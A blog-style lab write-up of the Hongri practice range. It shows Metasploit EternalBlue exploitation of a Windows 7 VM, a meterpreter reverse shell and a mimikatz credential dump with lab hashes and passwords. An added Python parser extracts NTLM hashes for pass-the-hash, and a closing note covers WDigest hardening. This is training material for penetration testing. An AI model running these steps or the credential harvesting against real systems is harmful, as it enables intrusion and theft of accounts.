cfs Hongri (红日) range part 1: redoing the pentest with msf in WSL, notes

Last time I couldn't reproduce it because of network problems, so I'm doing it again now.
ms17_010:

msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhost 192.168.1.5
rhost => 192.168.1.5
msf6 auxiliary(scanner/smb/smb_ms17_010) > run

[+] 192.168.1.5:445       - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.1.5:445       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_ms17_010) >

Painful to get working, and now I see why.

I had set it up as bridged before, meaning anything on the same home Wi-Fi can ping each other.
But the Wi-Fi my laptop is on and the desktop are on different subnets.
I took a look: damn, the desktop is on a wired connection, and that subnet is 80.1,
while the laptop shows 80.2.

So there are three ways to fix it:

  • plug the laptop into Ethernet, but I can't do that right now
  • install another Kali VM inside VMware with the same (bridged) network setting
  • install WSL on the physical (host) machine and switch the VMware network to NAT

I meant to go with method 2 but ended up doing method 3 by accident.

set payload windows/x64/meterpreter/reverse_tcp
set rhost 192.168.80.128
set lport 4567
exploit

Here is the output:

msf6 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wi
                                             ki/Using-Metasploit
   RPORT          445              yes       The target port (TCP)
   SMBDomain                       no        (Optional) The Windows domain to use for authentication. Only affects Win
                                             dows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machin
                                             es.
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target. Only affects Windows
                                              Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target. Only affects Windows Server 20
                                             08 R2, Windows 7, Windows Embedded Standard 7 target machines.

Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.24.105.158   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.80.128
rhost => 192.168.80.128
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 172.24.105.158
lhost => 172.24.105.158
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lport 4567
lport => 4567
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 172.24.105.158:4567
[*] 192.168.80.128:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.80.128:445    - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.80.128:445    - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.80.128:445 - The target is vulnerable.
[*] 192.168.80.128:445 - Connecting to target for exploitation.
[+] 192.168.80.128:445 - Connection established for exploitation.
[+] 192.168.80.128:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.80.128:445 - CORE raw buffer dump (42 bytes)
[*] 192.168.80.128:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 192.168.80.128:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 192.168.80.128:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1
[+] 192.168.80.128:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.80.128:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.80.128:445 - Sending all but last fragment of exploit packet
[*] 192.168.80.128:445 - Starting non-paged pool grooming
[+] 192.168.80.128:445 - Sending SMBv2 buffers
[+] 192.168.80.128:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.80.128:445 - Sending final SMBv2 buffers.
[*] 192.168.80.128:445 - Sending last fragment of exploit packet!
[*] 192.168.80.128:445 - Receiving response from exploit packet
[+] 192.168.80.128:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.80.128:445 - Sending egg to corrupted connection.
[*] 192.168.80.128:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 172.24.96.1
[*] Meterpreter session 1 opened (172.24.105.158:4567 -> 172.24.96.1:53290 ) at 2022-04-23 22:35:25 +0800
[+] 192.168.80.128:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.80.128:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.80.128:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter >

Lol, I came in planning to escalate privileges and found I was SYSTEM from the start.
If you want to see escalation to SYSTEM you can go use Viper.

meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username       Domain  LM                              NTLM                            SHA1
--------       ------  --                              ----                            ----
Administrator  GOD     edea194d76c77d87840ac10a764c73  8a963371a63944419ec1adf687bb1b  343f44056ed02360aead5618dd42e46
                       62                              e5                              14b5f70cf
STU1$          GOD                                     0ba7dcdc7f5bef947c985490b99228  e5c0f994e94ef2ac378ddb8c784bfb3
                                                       c1                              3dda7927a

wdigest credentials
===================

Username       Domain  Password
--------       ------  --------
(null)         (null)  (null)
Administrator  GOD     hongrisec@2019
STU1$          GOD     df ee 90 18 9c 48 2d 8a e9 98 49 06 01 ca d4 7f 79 c8 19 1f ab e2 63 50 2f 54 c9 08 09 3f f0 49
                        82 94 6c b1 86 bb 44 57 7c 39 76 46 03 78 c3 e1 a5 74 02 f8 9c 81 b2 5a 12 e5 01 b1 53 18 ed 2
                       c 6d 0f 71 dd 7c 7c 00 8a e7 51 56 5c 3a 11 3a 18 b2 f8 58 b4 08 0d 20 ca b8 00 72 27 be 71 d6
                       42 9d fb 13 d0 f8 fb f4 5a af 45 af 87 d7 20 cc 4e 68 c9 f9 67 c0 a9 7d 75 66 88 0c 8c 05 c5 88
                        1a bd a9 79 5b 63 cd a7 3d 19 9b 4d 93 ce 61 b9 68 39 9b 8b bd 53 2e 28 6b 5b 55 21 ee 2e 61 5
                       9 b5 4c 77 49 0e eb cc 92 31 94 5f 3a 0d d5 61 8f 1f 38 75 0e 70 bd fc 99 94 a3 80 95 49 b0 b0
                       84 e5 c6 0a 60 d7 52 ac 25 52 2a 62 f8 e3 8b 2a 72 b2 53 8d eb f0 ce e6 cf 0d 7a 4b 3b 03 4d 6e
                        74 bb d1 8d 71 32 31 1c 4f 9e b6 f4 85 d8 0d 4b b6 03

tspkg credentials
=================

Username       Domain  Password
--------       ------  --------
Administrator  GOD     hongrisec@2019

kerberos credentials
====================

Username       Domain   Password
--------       ------   --------
(null)         (null)   (null)
Administrator  GOD.ORG  hongrisec@2019
stu1$          god.org  df ee 90 18 9c 48 2d 8a e9 98 49 06 01 ca d4 7f 79 c8 19 1f ab e2 63 50 2f 54 c9 08 09 3f f0 4
                        9 82 94 6c b1 86 bb 44 57 7c 39 76 46 03 78 c3 e1 a5 74 02 f8 9c 81 b2 5a 12 e5 01 b1 53 18 ed
                         2c 6d 0f 71 dd 7c 7c 00 8a e7 51 56 5c 3a 11 3a 18 b2 f8 58 b4 08 0d 20 ca b8 00 72 27 be 71
                        d6 42 9d fb 13 d0 f8 fb f4 5a af 45 af 87 d7 20 cc 4e 68 c9 f9 67 c0 a9 7d 75 66 88 0c 8c 05 c
                        5 88 1a bd a9 79 5b 63 cd a7 3d 19 9b 4d 93 ce 61 b9 68 39 9b 8b bd 53 2e 28 6b 5b 55 21 ee 2e
                         61 59 b5 4c 77 49 0e eb cc 92 31 94 5f 3a 0d d5 61 8f 1f 38 75 0e 70 bd fc 99 94 a3 80 95 49
                        b0 b0 84 e5 c6 0a 60 d7 52 ac 25 52 2a 62 f8 e3 8b 2a 72 b2 53 8d eb f0 ce e6 cf 0d 7a 4b 3b 0
                        3 4d 6e 74 bb d1 8d 71 32 31 1c 4f 9e b6 f4 85 d8 0d 4b b6 03
stu1$          GOD.ORG  df ee 90 18 9c 48 2d 8a e9 98 49 06 01 ca d4 7f 79 c8 19 1f ab e2 63 50 2f 54 c9 08 09 3f f0 4
                        9 82 94 6c b1 86 bb 44 57 7c 39 76 46 03 78 c3 e1 a5 74 02 f8 9c 81 b2 5a 12 e5 01 b1 53 18 ed
                         2c 6d 0f 71 dd 7c 7c 00 8a e7 51 56 5c 3a 11 3a 18 b2 f8 58 b4 08 0d 20 ca b8 00 72 27 be 71
                        d6 42 9d fb 13 d0 f8 fb f4 5a af 45 af 87 d7 20 cc 4e 68 c9 f9 67 c0 a9 7d 75 66 88 0c 8c 05 c
                        5 88 1a bd a9 79 5b 63 cd a7 3d 19 9b 4d 93 ce 61 b9 68 39 9b 8b bd 53 2e 28 6b 5b 55 21 ee 2e
                         61 59 b5 4c 77 49 0e eb cc 92 31 94 5f 3a 0d d5 61 8f 1f 38 75 0e 70 bd fc 99 94 a3 80 95 49
                        b0 b0 84 e5 c6 0a 60 d7 52 ac 25 52 2a 62 f8 e3 8b 2a 72 b2 53 8d eb f0 ce e6 cf 0d 7a 4b 3b 0
                        3 4d 6e 74 bb d1 8d 71 32 31 1c 4f 9e b6 f4 85 d8 0d 4b b6 03

meterpreter >
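
The `creds_all` output above is hard to use as printed: msf wraps long cells onto following lines, so the LM/NTLM/SHA1 values and the machine-account password blob are split mid-token. As an added example, not from the original post or from Metasploit, here is a parser that rebuilds those tables from the fixed-width layout, then pulls out what a practitioner actually wants: the NTLM hashes (usable for pass-the-hash even when nothing plaintext was cached) and the plaintext logons, with the machine account's random binary password recognised and set aside. The embedded input is an abridged copy of the output above (the STU1$ blob cut short), not invented data.

```python
# Added example, not from the original post: parse kiwi's wrapped `creds_all`
# tables. SAMPLE is an abridged copy of the post's output (STU1$ blob truncated);
# continuation lines are built with explicit padding to match msf's layout.
import re

SAMPLE = "\n".join([
    "[+] Running as SYSTEM",
    "[*] Retrieving all credentials",
    "msv credentials",
    "===============",
    "",
    "Username" + " " * 7 + "Domain  LM" + " " * 30 + "NTLM" + " " * 28 + "SHA1",
    "--------" + " " * 7 + "------  --" + " " * 30 + "----" + " " * 28 + "----",
    "Administrator  GOD     edea194d76c77d87840ac10a764c73  8a963371a63944419ec1adf687bb1b  343f44056ed02360aead5618dd42e46",
    " " * 23 + "62" + " " * 30 + "e5" + " " * 30 + "14b5f70cf",
    "STU1$" + " " * 10 + "GOD" + " " * 5 + " " * 32 + "0ba7dcdc7f5bef947c985490b99228  e5c0f994e94ef2ac378ddb8c784bfb3",
    " " * 55 + "c1" + " " * 30 + "3dda7927a",
    "",
    "wdigest credentials",
    "===================",
    "",
    "Username" + " " * 7 + "Domain  Password",
    "--------" + " " * 7 + "------  --------",
    "(null)" + " " * 9 + "(null)  (null)",
    "Administrator  GOD     hongrisec@2019",
    "STU1$" + " " * 10 + "GOD     df ee 90 18 9c 48 2d 8a e9 98 49 06 01 ca d4 7f 79 c8 19 1f ab e2 63 50 2f 54 c9 08 09 3f f0 49",
    " " * 24 + "82 94 6c b1 86 bb 44 57 7c 39 76 46 03 78 c3 e1 a5 74 02 f8 9c 81 b2 5a 12 e5 01 b1 53 18 ed 2",
    " " * 23 + "c 6d 0f 71",
    "",
    "tspkg credentials",
    "=================",
    "",
    "Username" + " " * 7 + "Domain  Password",
    "--------" + " " * 7 + "------  --------",
    "Administrator  GOD     hongrisec@2019",
    "",
])

HEX_DUMP = re.compile(r"(?:[0-9a-f]{2} )+[0-9a-f]{2}")


def parse_creds_all(text):
    """Return {package: [row dict, ...]} from creds_all output.

    Each package is a fixed-width table; a row is its first line plus every
    following line that starts with whitespace. Column offsets come from the
    dashed underline. Wrapped pieces are joined with no separator: when msf
    broke a cell at a space it kept that space at the start of the next piece.
    """
    sections = {}
    lines = text.splitlines()
    i = 0
    while i < len(lines):
        m = re.fullmatch(r"(\w+) credentials", lines[i].strip())
        if not m:
            i += 1
            continue
        package = m.group(1)
        while i < len(lines) and not lines[i].startswith("Username"):
            i += 1
        if i + 1 >= len(lines):
            break
        header, dashes = lines[i], lines[i + 1]
        starts = [d.start() for d in re.finditer(r"-+", dashes)]
        spans = list(zip(starts, starts[1:] + [None]))
        names = [header[a:b].strip() for a, b in spans]
        rows = []
        i += 2
        while i < len(lines) and lines[i].strip():
            pieces = [lines[i][a:b].rstrip() for a, b in spans]
            if lines[i][0].isspace() and rows:      # continuation of previous row
                for name, piece in zip(names, pieces):
                    rows[-1][name] += piece
            else:
                rows.append(dict(zip(names, pieces)))
            i += 1
        sections[package] = [{k: v.strip() for k, v in r.items()} for r in rows]
    return sections


def classify(value):
    """'none' for empty/(null); 'binary' for a kiwi hex dump, which is how a
    machine account's random password shows up; 'hash' for a bare 32-hex
    LM/NTLM value; anything else is a plaintext password."""
    if value in ("", "(null)"):
        return "none"
    if HEX_DUMP.fullmatch(value):
        return "binary"
    if re.fullmatch(r"[0-9a-f]{32}", value):
        return "hash"
    return "plaintext"


def ntlm_hashes(sections):
    """{username: NTLM} from the msv table (pass-the-hash material)."""
    return {r["Username"]: r["NTLM"] for r in sections.get("msv", [])
            if classify(r["NTLM"]) == "hash"}


def plaintext_logons(sections):
    """{(DOMAIN, user, password): [packages]} for human-readable passwords
    found in any SSP cache other than msv."""
    found = {}
    for package, rows in sections.items():
        if package == "msv":
            continue
        for r in rows:
            pw = r.get("Password", "")
            if classify(pw) == "plaintext":
                key = (r["Domain"].upper(), r["Username"].lower(), pw)
                found.setdefault(key, []).append(package)
    return {k: sorted(v) for k, v in found.items()}
```

Two caveats the output itself hints at. The plaintext in wdigest is there because this is Windows 7 without the WDigest hardening (KB2871997 adds the `UseLogonCredential` value under `HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest`; set to 0 it stops the plaintext caching, and Windows 8.1/2012 R2 and later ship with it off), so on a patched host only the msv hashes would remain. And STU1$ is not a dead end just because its password is a binary blob: its NTLM hash in the msv table is the machine account's credential and works for pass-the-hash like any other.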